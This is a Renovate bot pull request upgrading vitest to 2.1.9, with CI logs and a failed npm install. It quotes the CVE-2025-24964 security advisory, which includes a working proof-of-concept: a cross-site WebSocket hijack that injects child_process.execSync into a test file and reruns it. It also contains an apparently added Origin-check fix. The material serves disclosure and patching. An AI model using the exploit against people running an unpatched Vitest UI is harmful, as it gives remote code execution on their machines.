@renovate renovate bot commented Dec 8, 2025

This PR contains the following updates:

Package | Change
vitest (source) | 2.1.5 → 2.1.9

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote code execution when accessing a malicious website while the Vitest API server is listening, via Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When the api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check the Origin header, did not have any authorization mechanism, and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has a saveTestFile API that can edit a test file and a rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting code into a test file via the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have a calc executable in your PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using the Vitest serve API.


Release Notes

vitest-dev/vitest (vitest)

v2.1.9

Compare Source

This release includes security patches for:

   🐞 Bug Fixes
    View changes on GitHub

v2.1.8

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v2.1.7

Compare Source

   🐞 Bug Fixes
  • Revert support for Vite 6  -  by @sheremet-va (fbe5c)
    • This introduced some breaking changes (#6992). We will enable support for it later. In the meantime, you can still use pnpm.overrides or yarn resolutions to override the vite version in the vitest package - the APIs are compatible.
    View changes on GitHub

v2.1.6

Compare Source

🚀 Features

  • Support Vite 6
    View changes on GitHub

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - "after 9am every weekday,before 5pm every weekday" (UTC).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
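The advisory above comes down to one missing check: a browser always sends an Origin header on a WebSocket handshake, and a local dev server that never inspects it will accept a handshake initiated by any page the user happens to have open. The following is an added example, not Vitest's code and not the upstream fix, of how a Node server can reject such handshakes at the HTTP upgrade step. The allowed origin list (localhost and 127.0.0.1 on port 51204, the port used in the PoC) is an assumption for illustration; the guard works with any object exposing an `on('upgrade', ...)` event, such as Node's `http.Server`.

```javascript
// Added example: Origin validation for a WebSocket upgrade, the check that
// CVE-2025-24964 describes as missing. No third-party WebSocket library is used.

// Assumed allow-list for a local dev UI. Only the dev server's own origin(s)
// belong here; a wildcard or substring match would reopen the hole.
const DEFAULT_ALLOWED_ORIGINS = new Set([
  'http://localhost:51204',
  'http://127.0.0.1:51204',
]);

// True only when the Origin header, after URL normalization, exactly matches
// an allowed origin. A missing, empty or unparsable header (including the
// literal "null" sent by sandboxed iframes) is treated as untrusted rather than
// as "not a browser, therefore safe".
function isAllowedOrigin(origin, allowed = DEFAULT_ALLOWED_ORIGINS) {
  if (typeof origin !== 'string' || origin.length === 0) return false;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return false; // malformed or "null" origin
  }
  // Compare scheme + host + port, not the raw string, so casing or a trailing
  // slash cannot produce a false match or a false rejection.
  return allowed.has(parsed.origin);
}

// Pure decision function over request headers, so the policy can be unit tested
// without sockets. Returns { ok: true } or { ok: false, status, reason }.
function checkUpgradeRequest(headers, allowed = DEFAULT_ALLOWED_ORIGINS) {
  const upgrade = String(headers['upgrade'] || '').toLowerCase();
  if (upgrade !== 'websocket') {
    return { ok: false, status: 400, reason: 'Bad Request' };
  }
  if (!isAllowedOrigin(headers['origin'], allowed)) {
    return { ok: false, status: 403, reason: 'Forbidden' };
  }
  return { ok: true };
}

// Attach the guard to the server's 'upgrade' event. A rejected handshake gets an
// HTTP error and the socket is closed before any WebSocket framing starts; an
// accepted one is handed to the real WebSocket handler (onAccepted).
function attachOriginGuard(server, allowed, onAccepted) {
  const allowList = allowed || DEFAULT_ALLOWED_ORIGINS;
  server.on('upgrade', (req, socket, head) => {
    const verdict = checkUpgradeRequest(req.headers, allowList);
    if (!verdict.ok) {
      socket.write(
        `HTTP/1.1 ${verdict.status} ${verdict.reason}\r\nConnection: close\r\n\r\n`
      );
      socket.destroy();
      return;
    }
    onAccepted(req, socket, head);
  });
  return server;
}
```

Usage is `attachOriginGuard(httpServer, DEFAULT_ALLOWED_ORIGINS, handleWebSocket)` before the server starts listening. Note that an Origin check only defends against browser-initiated hijacking; it does nothing against a non-browser client on the same host, which is why the advisory also calls out the absence of any authorization mechanism. A per-session token that the UI must present on connect covers that second gap.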

@renovate renovate bot added the dependencies Pull requests that update a dependency file label Dec 8, 2025

renovate bot commented Dec 8, 2025

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: apps/blueorange/package-lock.json
npm warn Unknown env config "store". This will stop working in the next major version of npm.
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: @vitest/ui@2.1.5
npm error Found: vitest@2.1.9
npm error node_modules/vitest
npm error   dev vitest@"2.1.9" from the root project
npm error
npm error Could not resolve dependency:
npm error peer vitest@"2.1.5" from @vitest/ui@2.1.5
npm error node_modules/@vitest/ui
npm error   dev @vitest/ui@"2.1.5" from the root project
npm error
npm error Conflicting peer dependency: vitest@2.1.5
npm error node_modules/vitest
npm error   peer vitest@"2.1.5" from @vitest/ui@2.1.5
npm error   node_modules/@vitest/ui
npm error     dev @vitest/ui@"2.1.5" from the root project
npm error
npm error Fix the upstream dependency conflict, or retry
npm error this command with --force or --legacy-peer-deps
npm error to accept an incorrect (and potentially broken) dependency resolution.
npm error
npm error
npm error For a full report see:
npm error /runner/cache/others/npm/_logs/2026-01-08T17_06_25_890Z-eresolve-report.txt
npm error A complete log of this run can be found in: /runner/cache/others/npm/_logs/2026-01-08T17_06_25_890Z-debug-0.log

@renovate renovate bot enabled auto-merge (squash) December 8, 2025 14:09
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch 4 times, most recently from 002056b to aeb7c38 Compare December 15, 2025 13:30
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch 5 times, most recently from 28df6f3 to 2b0a8b7 Compare December 23, 2025 11:05
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 2b0a8b7 to 9e28aa7 Compare January 4, 2026 13:09

github-actions bot commented Jan 4, 2026

Run report for 0f84fb4e (macos-latest, macOS, 0, 1, 1)

Total time: 1m 30s | Comparison time: 13m 51s | Estimated savings: 12m 21s (89.1% faster)

Action Time Status Info
🟩 SyncWorkspace 11.6ms Passed
🟩 SyncProject(claude-code) 1.4ms Passed
🟩 SyncProject(vendir) 1.9ms Passed
🟩 SyncProject(devenv) 14.9ms Passed
🟦 RunTask(claude-code:build) 7.3s Cached
🟦 RunTask(vendir:build) 1m 29s Cached
🟦 RunTask(devenv:test) 610.9ms Cached
Environment

OS: macOS
Matrix:

os = macos-latest
name = macOS
index = 0
total = 1
job_number = 1

Variables:

MOON_TOOLCHAIN_FORCE_GLOBALS = true
Touched files
apps/blueorange/package.json


github-actions bot commented Jan 4, 2026

Run report for 0f84fb4e (ubuntu-latest, Linux, 0, 2, 1)

Total time: 8.9ms | Comparison time: 0s | Estimated loss: 8.9ms (100.0% slower)

Action Time Status Info
🟩 SyncWorkspace 8.9ms Passed
Environment

OS: Linux
Matrix:

os = ubuntu-latest
name = Linux
index = 0
total = 2
job_number = 1

Variables:

MOON_TOOLCHAIN_FORCE_GLOBALS = true
Touched files
apps/blueorange/package.json


github-actions bot commented Jan 4, 2026

Run report for 0f84fb4e (ubuntu-latest, Linux, 1, 2, 2)

Total time: 6.8s | Comparison time: 15.2s | Estimated savings: 8.4s (55.2% faster)

Action Time Status Info
🟩 SyncWorkspace 8.9ms Passed
🟩 SyncProject(escaperoom) 0.2ms Passed
🟩 SyncProject(blueorange) 0.4ms Passed
🟦 RunTask(escaperoom:test) 1.1s Cached
🟥 RunTask(blueorange:install) 6.8s Failed
⬛️ RunTask(blueorange:test) 0.1ms Skipped
⬛️ RunTask(blueorange:build) 0.2ms Skipped
Environment

OS: Linux
Matrix:

os = ubuntu-latest
name = Linux
index = 1
total = 2
job_number = 2

Variables:

MOON_TOOLCHAIN_FORCE_GLOBALS = true
Touched files
apps/blueorange/package.json

@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch 4 times, most recently from d706164 to 88e4a18 Compare January 5, 2026 06:27
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 88e4a18 to 0f84fb4 Compare January 8, 2026 13:54